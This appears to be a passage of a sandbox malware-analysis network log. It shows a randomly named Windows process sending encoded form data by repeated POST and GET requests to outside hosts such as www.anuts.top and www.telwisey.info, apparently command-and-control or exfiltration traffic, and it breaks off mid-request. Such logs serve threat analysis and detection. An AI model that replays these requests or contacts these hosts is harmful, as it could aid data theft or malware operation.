Aug 13, 2024 06:44:05.255122900 CEST	519	OUT	GET /4hda/?jN=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG94cDJ5htquBO11HcjCOymydCfo0q1+e/CBcncmTCUQD5IVA==&uXTT=8FDHY8dP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.xn--matfrmn-jxa4m.se Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 13, 2024 06:44:05.919945002 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 13 Aug 2024 04:44:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.29 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Aug 13, 2024 06:44:05.919992924 CEST	224	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
Aug 13, 2024 06:44:05.920039892 CEST	1236	IN	Data Raw: 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
Aug 13, 2024 06:44:05.920074940 CEST	1236	IN	Data Raw: 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
Aug 13, 2024 06:44:05.920135975 CEST	1236	IN	Data Raw: 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 69 61 20 43 75 73 74 6f 6d 65 72 20 Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
Aug 13, 2024 06:44:05.920170069 CEST	654	IN	Data Raw: 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72 20 77 65 62 20 68 6f 73 74 69 6e 67 Data Ascii: m_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loopia.se?utm_me

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49729	23.251.54.212	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:44:11.585572958 CEST	761	OUT	POST /li0t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.anuts.top Origin: http://www.anuts.top Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Referer: http://www.anuts.top/li0t/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 70 6e 2f 79 52 51 68 59 6a 4a 62 56 56 49 73 68 33 32 4a 64 46 4f 30 53 53 6d 4e 55 33 75 52 57 53 6e 37 78 33 42 46 69 48 55 6a 50 69 38 6c 34 43 4b 6d 75 66 75 43 70 6b 77 63 2b 67 37 6f 2b 46 65 61 43 76 6f 35 65 76 79 6e 69 55 72 38 54 4d 6a 4a 78 75 42 41 46 70 53 35 45 61 45 56 68 35 7a 43 69 47 38 43 70 46 4b 4c 75 77 54 58 69 36 6b 6c 79 32 4a 4a 4e 33 41 73 53 42 37 67 65 73 31 75 74 70 77 31 35 6b 39 55 47 55 73 35 54 35 59 39 6c 33 66 30 55 61 46 69 63 74 46 74 62 79 39 70 78 74 51 74 48 6c 62 54 78 39 63 6f 72 49 6b 77 45 41 6b 77 67 4e 66 67 3d Data Ascii: jN=RXwfOcHa9T4Mpn/yRQhYjJbVVIsh32JdFO0SSmNU3uRWSn7x3BFiHUjPi8l4CKmufuCpkwc+g7o+FeaCvo5evyniUr8TMjJxuBAFpS5EaEVh5zCiG8CpFKLuwTXi6kly2JJN3AsSB7ges1utpw15k9UGUs5T5Y9l3f0UaFictFtby9pxtQtHlbTx9corIkwEAkwgNfg=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49730	23.251.54.212	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:44:14.116482973 CEST	781	OUT	POST /li0t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.anuts.top Origin: http://www.anuts.top Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Referer: http://www.anuts.top/li0t/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 42 57 53 47 4c 78 32 44 74 69 41 55 6a 50 73 63 6b 79 63 36 6d 70 66 75 47 68 6b 31 6b 2b 67 37 38 2b 46 61 57 43 76 37 68 52 75 69 6e 67 4d 62 38 64 49 6a 4a 78 75 42 41 46 70 53 38 5a 61 41 78 68 34 44 53 69 46 59 32 75 62 36 4c 70 6d 6a 58 69 70 30 6c 32 32 4a 4a 2f 33 46 49 30 42 39 6b 65 73 77 4b 74 71 68 31 36 2f 4e 55 4d 4b 63 34 6e 33 4c 49 31 31 4e 34 4a 57 32 50 35 31 6e 63 6e 36 72 45 62 33 79 6c 76 32 37 2f 4a 74 50 67 63 5a 55 52 74 61 48 67 51 54 49 31 2b 34 5a 50 4e 78 57 78 32 47 73 4b 52 52 70 78 57 42 6e 32 72 Data Ascii: jN=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YBWSGLx2DtiAUjPsckyc6mpfuGhk1k+g78+FaWCv7hRuingMb8dIjJxuBAFpS8ZaAxh4DSiFY2ub6LpmjXip0l22JJ/3FI0B9keswKtqh16/NUMKc4n3LI11N4JW2P51ncn6rEb3ylv27/JtPgcZURtaHgQTI1+4ZPNxWx2GsKRRpxWBn2r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49731	23.251.54.212	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:44:16.648509026 CEST	1798	OUT	POST /li0t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.anuts.top Origin: http://www.anuts.top Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Referer: http://www.anuts.top/li0t/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 4a 57 54 30 7a 78 32 6b 5a 69 42 55 6a 50 79 4d 6b 78 63 36 6d 30 66 71 69 6c 6b 31 35 46 67 35 45 2b 45 35 65 43 36 2b 4e 52 67 69 6e 67 51 72 38 51 4d 6a 49 72 75 42 52 43 70 54 4d 5a 61 41 78 68 34 42 61 69 52 38 43 75 5a 36 4c 75 77 54 58 75 36 6b 6c 65 32 4a 52 46 33 46 4d 43 43 4e 45 65 76 51 61 74 6d 33 5a 36 7a 4e 55 4b 4c 63 34 2f 33 4c 56 76 31 4e 6b 46 57 32 4b 63 31 6c 38 6e 35 39 56 54 6a 43 70 75 6f 34 50 65 69 74 34 62 65 42 70 6a 58 55 49 6e 58 62 68 73 38 6f 48 6e 38 6a 46 4d 4d 75 58 41 50 39 46 36 50 68 6e 36 66 6f 75 73 53 6a 61 63 70 4b 56 4c 72 6b 39 52 38 49 70 6c 73 38 61 76 76 74 45 49 53 7a 46 68 41 47 41 32 74 6a 6d 49 57 7a 30 74 52 38 78 42 67 70 71 68 67 49 4c 43 78 2b 70 78 58 70 61 63 36 47 42 79 4a 42 77 37 2b 51 30 57 6b 56 6c 78 6b 77 4b 30 77 78 50 63 51 56 77 71 75 45 48 36 42 47 69 76 68 36 51 68 6a 30 77 57 76 58 6f 43 52 58 61 [TRUNCATED] Data Ascii: jN=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YJWT0zx2kZiBUjPyMkxc6m0fqilk15Fg5E+E5eC6+NRgingQr8QMjIruBRCpTMZaAxh4BaiR8CuZ6LuwTXu6kle2JRF3FMCCNEevQatm3Z6zNUKLc4/3LVv1NkFW2Kc1l8n59VTjCpuo4Peit4beBpjXUInXbhs8oHn8jFMMuXAP9F6Phn6fousSjacpKVLrk9R8Ipls8avvtEISzFhAGA2tjmIWz0tR8xBgpqhgILCx+pxXpac6GByJBw7+Q0WkVlxkwK0wxPcQVwquEH6BGivh6Qhj0wWvXoCRXaUrrN7YQXJ/GuPImg55fG3AExOdmINo9DVLDXRcO/2I8HC0HYrv4+fmcOX8piS8sCU0uhpKti2EgLe0WLV/iHP2PK1DQWBVbDcMbMek3uP6FFcrehRIc1lpSALltcIJmFOfPoOD/a+LUH77hpy28hqPXwLU82gMH1P39/llLoY/VdVQJXXi6Fk8ZojaliKH3FtX1865H8+BGt5452TPRD8rcq5c8nBJEif60cNi4RWmUj9q1SkEjUpm2b0ypgPZTVtgtjsOpA7SZ6Rh7F5ZCGhzdmbcz9lWr/U2l1NfJUjqBfH5X3VYfSD9PXdaCNHxr2aFOLqMZZpcjAI7N1WF6H+fW9J9HhL0QkXp8AArWwHSjVbuP/f+WXw9xsUmX2gpNmrWBy1Kh/ilwv15YFQZXxbmy2gmmi7D9q4eee8DjTpaJc5b9Kq2/d6YLVXBMosuxibF6JIuczLCjUz7oTiBMViyJRbkNEKjgaRJcnXN167XV5YUZRAlp/hA/yg0qqoyoI2++/aBduW59ziHqhdTJQ+5u1yjIIt7n2YeUi4cffD5HQt1adobB/9VWtrCTl91MOqytrRpfrRD7ZHs9V2+Q0kQEoRPT6nMGzqTw7r6sGrgtdGROS78xZWBQeqQSe7qiLFbkRWdNwu8mivjtT3i2+RKgq8Y0o7lVzQu [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49732	23.251.54.212	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:44:19.178416967 CEST	508	OUT	GET /li0t/?uXTT=8FDHY8dP&jN=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfhgzxX5A8Pgwb+i5XvTgZRBJb2EypYfKSb86Vxi/qsGcisw== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.anuts.top Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49733	199.192.19.19	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:44:45.611994028 CEST	773	OUT	POST /ei85/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.telwisey.info Origin: http://www.telwisey.info Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Referer: http://www.telwisey.info/ei85/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 4b 4a 50 4e 6e 70 4d 64 5a 63 2b 53 48 41 38 54 45 72 72 46 6e 6d 79 64 61 4d 4e 77 72 6f 4d 4a 30 4b 2f 2f 36 51 55 79 54 33 56 46 59 45 69 4b 63 4a 78 32 43 45 2b 6e 30 63 74 73 37 4c 35 70 61 57 32 77 48 76 52 50 6d 53 70 32 43 67 7a 67 76 42 54 6e 6a 31 38 74 4d 6b 6c 48 59 68 64 31 6f 45 47 4d 50 2b 6c 75 74 47 36 4d 49 38 52 47 68 59 42 53 4f 4b 4c 4b 33 51 37 36 66 73 62 35 4d 43 66 57 6e 56 74 6b 33 59 31 79 78 52 58 6c 39 2b 4a 33 34 75 7a 58 39 30 6c 32 6c 59 6f 33 39 34 2f 31 37 62 5a 4c 58 66 34 57 65 6a 4d 2f 35 79 44 74 6c 30 59 6b 69 44 55 3d Data Ascii: jN=DTOKciQymv5BKJPNnpMdZc+SHA8TErrFnmydaMNwroMJ0K//6QUyT3VFYEiKcJx2CE+n0cts7L5paW2wHvRPmSp2CgzgvBTnj18tMklHYhd1oEGMP+lutG6MI8RGhYBSOKLK3Q76fsb5MCfWnVtk3Y1yxRXl9+J34uzX90l2lYo394/17bZLXf4WejM/5yDtl0YkiDU=
Aug 13, 2024 06:44:46.208030939 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 13 Aug 2024 04:44:46 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Aug 13, 2024 06:44:46.208051920 CEST	1236	IN	Data Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
Aug 13, 2024 06:44:46.208069086 CEST	448	IN	Data Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
Aug 13, 2024 06:44:46.208131075 CEST	1236	IN	Data Raw: 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 35 31 38 2e 30 37 22 20 79 31 3d 22 32 34 35 2e 33 37 35 22 20 78 32 3d 22 35 31 38 2e 30 37 22 20 79 32 3d 22 32 36 36 2e 35 38 31 22 Data Ascii: erlimit="10" x1="518.07" y1="245.375" x2="518.07" y2="266.581" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="508.129" y1="255
Aug 13, 2024 06:44:46.208147049 CEST	1236	IN	Data Raw: 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 30 30 2e 36 37 22 20 79 31 3d 22 Data Ascii: stroke-linecap="round" stroke-miterlimit="10" x1="200.67" y1="483.11" x2="200.67" y2="504.316" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
Aug 13, 2024 06:44:46.208161116 CEST	448	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="231.468" y1="291.009" x2="231.468" y2="299.369" /> <line fill="none"
Aug 13, 2024 06:44:46.208434105 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
Aug 13, 2024 06:44:46.208450079 CEST	1236	IN	Data Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
Aug 13, 2024 06:44:46.208465099 CEST	448	IN	Data Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
Aug 13, 2024 06:44:46.208488941 CEST	1236	IN	Data Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
Aug 13, 2024 06:44:46.213171959 CEST	1236	IN	Data Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74 Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49734	199.192.19.19	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:44:48.151527882 CEST	793	OUT	POST /ei85/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.telwisey.info Origin: http://www.telwisey.info Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Referer: http://www.telwisey.info/ei85/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 63 4a 30 75 7a 2f 37 52 55 79 65 58 56 46 41 55 69 44 59 